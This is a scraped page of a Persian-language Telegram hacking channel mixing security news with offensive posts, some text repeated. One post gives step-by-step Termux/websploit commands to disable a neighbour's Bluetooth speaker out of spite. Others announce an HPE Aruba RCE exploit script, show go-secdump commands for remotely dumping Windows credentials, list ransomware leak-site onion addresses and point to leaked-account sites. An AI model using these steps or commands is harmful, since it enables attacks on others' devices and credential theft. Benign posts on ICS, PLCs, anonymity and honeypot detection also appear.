Post #661
432
Channel Public Channel
P. P.F.K Security
@pfksecurity
APT / Exploit / Malware / ICS / OT / Vulnerability Analysis / SE
- Subscribers
- 2.1K
- Photos
- 132
- Videos
- 46
- Links
- 424
Showing posts older than #662 · Back to latest
Older Posts 20 shown
Post #660
468
CVE-2024-26304.py4.3 KB
CVE-2024-26304 RCE-exploit
HPE Aruba Device
usage:
@PfkSecurity
HPE Aruba Device
usage:
python3 CVE-2024-26304.py -u http://127.0.0.1
@PfkSecurity
Post #659
714
سلام به همه، امروز در مورد یکی دیگر از کاربردهای جالب termux در گوشی هوشمندتان به شما خواهم گفت.
بیایید موقعیتی را تصور کنیم که در آن همسایگان نمک نخورده و ناکافی شما تصمیم گرفتند در شب موسیقی را از بلندگو/مرکز موسیقی بلوتوث خود پخش کنند. شرایط متفاوت است، اما اگر واقعا مردم شروع به گستاخی می کنند، پس من این راه حل را پیشنهاد می کنم
Termux را باز کنید و این دستورات را بنویسید:
apt install python3
pip install scapy
git clone https://github.com/The404Hacking/websploit
cd websploit
chmod 777 * websploit.py
python3 websploit.py
بعد، هر اسکنر بلوتوثی را باز کنید و آدرس دستگاه مورد نیاز خود را با نام پیدا کنید
سپس این دستورات را وارد کنید:
use bluetooth/bluetooth_pod
set bdaddr xx:xx:xx:xx:xx:xx
در اینجا xx را با آدرس دستگاه مورد نظر جایگزین کنید.
و وارد شوید - run
اکنون می توانید با آرامش در سکوت به رختخواب بروید.
@PfkSecurity
بیایید موقعیتی را تصور کنیم که در آن همسایگان نمک نخورده و ناکافی شما تصمیم گرفتند در شب موسیقی را از بلندگو/مرکز موسیقی بلوتوث خود پخش کنند. شرایط متفاوت است، اما اگر واقعا مردم شروع به گستاخی می کنند، پس من این راه حل را پیشنهاد می کنم
Termux را باز کنید و این دستورات را بنویسید:
apt install python3
pip install scapy
git clone https://github.com/The404Hacking/websploit
cd websploit
chmod 777 * websploit.py
python3 websploit.py
بعد، هر اسکنر بلوتوثی را باز کنید و آدرس دستگاه مورد نیاز خود را با نام پیدا کنید
سپس این دستورات را وارد کنید:
use bluetooth/bluetooth_pod
set bdaddr xx:xx:xx:xx:xx:xx
در اینجا xx را با آدرس دستگاه مورد نظر جایگزین کنید.
و وارد شوید - run
اکنون می توانید با آرامش در سکوت به رختخواب بروید.
@PfkSecurity
Post #657
510
💡دیداس چگونه کار می کند اما نگاهی سه بعدی ...
@PfkSecurity
@PfkSecurity
Post #656
584

💡بعضی از شما پرسیدهاید که URL برای دیدن آخرین نسخههای درام Evil Corp و LockBit چیست:
lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead.onion
@PfkSecurity
lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead.onion
@PfkSecurity
Post #655
571
🚨گروه باج افزار جدید: نیتروژن : Nitrogen
nitrogenczslprh3xyw6lh5xyjvmsz7ciljoqxxknd7uymkfetfhgvqd.onion
@PfkSecurity
nitrogenczslprh3xyw6lh5xyjvmsz7ciljoqxxknd7uymkfetfhgvqd.onion
@PfkSecurity
Post #654
536
Post #653
556

امروز سالگرد تاجگذاری شاهنشاه داریوش بزرگ هخامنشی هست
خداوند این کشور را از دشمن، از خشکسالی و دروغ محفوظ دارد.
@PfkSecurity
خداوند این کشور را از دشمن، از خشکسالی و دروغ محفوظ دارد.
@PfkSecurity
Post #649
570
Post #648
602
Industrial Control Systems Cybersecurity.pdf1.6 MB
Industrial Control Systems Cybersecurity
@PfkSecurity
@PfkSecurity
Post #647
716
🔸️ موتورهای جستجوی DataBreach
🔹️برخی از بهترین موتورهای جستجوی نقض اطلاعات
∙ Leak.sx - https://leak.sx/
∙ Intelligence X - https://intelx.io/
∙ leakcheck - https://leakcheck.io/
∙ weleakinfo - https://weleakinfo.to/
∙ leakpeek - https://leakpeek.com/
∙ snusbase - https://snusbase.com/
∙ leakedsource - https://wikileaks.org/
∙ leakedstuffs - https://piro.eu.org/
∙ WikiLeaks - https://cryptome.org/
∙ GlobaLeaks - https://lnkd.in/gJqT83f
∙ Firefox Monitor - https://lnkd.in/gW7EqXr
∙ haveibeenpwned? - https://haveibeenpwned.com/
∙ BreachAlarm - https://breachalarm.com/
∙ freetools - https://piro.eu.org/
@PfkSecurity
leak.sx Leak.sx | Homepage | best source for hacking tools. Leak.sx - The best leaked accounts website, Homepage, free combo tool, ai image generator, roblox free roblox accounts, free membership for netflix,Minecraft account generator. 🔹️برخی از بهترین موتورهای جستجوی نقض اطلاعات
∙ Leak.sx - https://leak.sx/
∙ Intelligence X - https://intelx.io/
∙ leakcheck - https://leakcheck.io/
∙ weleakinfo - https://weleakinfo.to/
∙ leakpeek - https://leakpeek.com/
∙ snusbase - https://snusbase.com/
∙ leakedsource - https://wikileaks.org/
∙ leakedstuffs - https://piro.eu.org/
∙ WikiLeaks - https://cryptome.org/
∙ GlobaLeaks - https://lnkd.in/gJqT83f
∙ Firefox Monitor - https://lnkd.in/gW7EqXr
∙ haveibeenpwned? - https://haveibeenpwned.com/
∙ BreachAlarm - https://breachalarm.com/
∙ freetools - https://piro.eu.org/
@PfkSecurity
Post #646
971
Basic of PLC.pdf2 MB
Basics of #PLC
@PfkSecurity
@PfkSecurity
Post #643
986
Post #642
565
چگونه ناشناس شویم
از یک سیستم عامل متمرکز بر حریم خصوصی مانند Tails استفاده کنید که تمام ترافیک اینترنت را از طریق شبکه Tor هدایت می کند.
از VPN یا TOR برای پنهان کردن آدرس IP و رمزگذاری ترافیک اینترنت خود استفاده کنید.
به جای نام واقعی خود از نام مستعار استفاده کنید.
از استفاده آنلاین از اطلاعات شخصی مانند آدرس منزل یا تاریخ تولد خودداری کنید.
از یک مرورگر وب امن مانند Tor، Brave، StartPage استفاده کنید که از ناشناس بودن شما محافظت می کند و webrtc را غیرفعال می کند.
از استفاده از آدرس ایمیل شخصی خود برای فعالیت های آنلاین خودداری کنید. از ایمیل جعلی برای فعالیت های ناشناس استفاده کنید
از اشتراک گذاری عکس ها یا داده های موقعیت مکانی در رسانه های اجتماعی خودداری کنید.
در صورت امکان از احراز هویت دو مرحله ای برای افزودن یک لایه امنیتی اضافی به حساب های آنلاین خود استفاده کنید.
برای جلوگیری از ردیابی، کوکی ها و تاریخچه مرور خود را به طور مرتب پاک کنید.
از استفاده از نام کاربری یکسان در چندین وب سایت خودداری کنید.
نیازهای خود را کنترل کنید زیرا نیازها و احساسات شما نسبت به دختر شما را آسیب پذیر می کند 💐 ❤️
از استفاده از شماره تلفن شخصی خود برای حساب های آنلاین خودداری کنید. آنها می توانند شما را به راحتی با این ردیابی کنند، در عوض، از یک شماره تلفن مجازی استفاده کنید.
از کلاهبرداری های فیشینگ و سایر تاکتیک ها مانند هانی پات که مهاجمان می توانند برای فریب شما برای افشای اطلاعات شخصی استفاده کنند آگاه باشید.
از یک سرویس به اشتراک گذاری فایل امن مانند SpiderOak استفاده کنید که فایل های شما را رمزگذاری می کند و ذخیره سازی ایمن را ارائه می دهد.
به غریزه خود اعتماد کنید و مراقب هر کسی که اطلاعات شخصی را میپرسد یا مشکوک به نظر میرسد باشید.
@PfkSecurity
از یک سیستم عامل متمرکز بر حریم خصوصی مانند Tails استفاده کنید که تمام ترافیک اینترنت را از طریق شبکه Tor هدایت می کند.
از VPN یا TOR برای پنهان کردن آدرس IP و رمزگذاری ترافیک اینترنت خود استفاده کنید.
به جای نام واقعی خود از نام مستعار استفاده کنید.
از استفاده آنلاین از اطلاعات شخصی مانند آدرس منزل یا تاریخ تولد خودداری کنید.
از یک مرورگر وب امن مانند Tor، Brave، StartPage استفاده کنید که از ناشناس بودن شما محافظت می کند و webrtc را غیرفعال می کند.
از استفاده از آدرس ایمیل شخصی خود برای فعالیت های آنلاین خودداری کنید. از ایمیل جعلی برای فعالیت های ناشناس استفاده کنید
از اشتراک گذاری عکس ها یا داده های موقعیت مکانی در رسانه های اجتماعی خودداری کنید.
در صورت امکان از احراز هویت دو مرحله ای برای افزودن یک لایه امنیتی اضافی به حساب های آنلاین خود استفاده کنید.
برای جلوگیری از ردیابی، کوکی ها و تاریخچه مرور خود را به طور مرتب پاک کنید.
از استفاده از نام کاربری یکسان در چندین وب سایت خودداری کنید.
نیازهای خود را کنترل کنید زیرا نیازها و احساسات شما نسبت به دختر شما را آسیب پذیر می کند 💐 ❤️
از استفاده از شماره تلفن شخصی خود برای حساب های آنلاین خودداری کنید. آنها می توانند شما را به راحتی با این ردیابی کنند، در عوض، از یک شماره تلفن مجازی استفاده کنید.
از کلاهبرداری های فیشینگ و سایر تاکتیک ها مانند هانی پات که مهاجمان می توانند برای فریب شما برای افشای اطلاعات شخصی استفاده کنند آگاه باشید.
از یک سرویس به اشتراک گذاری فایل امن مانند SpiderOak استفاده کنید که فایل های شما را رمزگذاری می کند و ذخیره سازی ایمن را ارائه می دهد.
به غریزه خود اعتماد کنید و مراقب هر کسی که اطلاعات شخصی را میپرسد یا مشکوک به نظر میرسد باشید.
@PfkSecurity
Post #641
432

🔄🖼️ go-secdump v0.3.0
ابزاری برای کپی از راه دور 🏠 اسرار ویندوز (SAM، LSA) بدون ذخیره در دیسک
پشتیبانی برای احراز هویت Kerberos اضافه شده است
مثال:
Relay:
گزینه های اصلی:
▶️ https://github.com/jfjallid/go-secdump
▶️ https://github.com/jfjallid/go-secdump/releases
@PfkSecurity
ابزاری برای کپی از راه دور 🏠 اسرار ویندوز (SAM، LSA) بدون ذخیره در دیسک
پشتیبانی برای احراز هویت Kerberos اضافه شده است
username + password
username + NT Hash
username + AES Key
cached credentials on Linux (TGS or TGT in .ccache file)
مثال:
./go-secdump --host DC01 --user Administrator --pass Password --local --sam --lsa --dcc2Relay:
./go-secdump --host 192.168.0.100 -n --relayگزینه های اصلی:
--host <target>
-P, --port <port>
-d, --domain <domain>
-u, --user <username>
-p, --pass <pass>
-n, --no-pass
--hash <NT Hash>
--local
-k, --kerberos
--dc-ip
--target-ip
--aes-key
--dump
--sam
--lsa
--dcc2
--relay
--relay-port <port>
▶️ https://github.com/jfjallid/go-secdump
▶️ https://github.com/jfjallid/go-secdump/releases
@PfkSecurity
Post #640
434
Post #639
511
Scan for CVE-2024-47176 (CUPS - Remote Code Execution) with Nuclei
Vulnerability discovery: https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
Nuclei Template: https://cloud.projectdiscovery.io/?template=CVE-2024-47176
Source: https://x.com/pdnuclei/status/1840195177098453308
@pfksecurity
Vulnerability discovery: https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
Nuclei Template: https://cloud.projectdiscovery.io/?template=CVE-2024-47176
Source: https://x.com/pdnuclei/status/1840195177098453308
@pfksecurity
Post #637
533
Post #636
927
تشخیص Honeypots
الگوهای هسته برای تشخیص honeypot.
این مخزن شامل قالبهای Nuclei برای شناسایی چندین هانیپات منبع باز معروف است، مانند: ADBHoney، Conpot، Cowrie، Dionaea (multiple services)، ElasticPot، Mailoney، Redis Honeypot، Snare و غیره.
https://github.com/UnaPibaGeek/honeypots-detection
#honeypot
@PfkSecurity
الگوهای هسته برای تشخیص honeypot.
این مخزن شامل قالبهای Nuclei برای شناسایی چندین هانیپات منبع باز معروف است، مانند: ADBHoney، Conpot، Cowrie، Dionaea (multiple services)، ElasticPot، Mailoney، Redis Honeypot، Snare و غیره.
https://github.com/UnaPibaGeek/honeypots-detection
#honeypot
@PfkSecurity
Post #635
513
NetGuard
راه های ساده و پیشرفته ای را برای مسدود کردن دسترسی به اینترنت ارائه می دهد - بدون نیاز به روت. برنامهها و آدرسها میتوانند بهصورت جداگانه اجازه داشته باشند یا از دسترسی به Wi-Fi و/یا اتصال تلفن همراه شما محروم شوند.
https://github.com/M66B/NetGuard
وب
https://netguard.me/
@pfksecurity
راه های ساده و پیشرفته ای را برای مسدود کردن دسترسی به اینترنت ارائه می دهد - بدون نیاز به روت. برنامهها و آدرسها میتوانند بهصورت جداگانه اجازه داشته باشند یا از دسترسی به Wi-Fi و/یا اتصال تلفن همراه شما محروم شوند.
https://github.com/M66B/NetGuard
وب
https://netguard.me/
@pfksecurity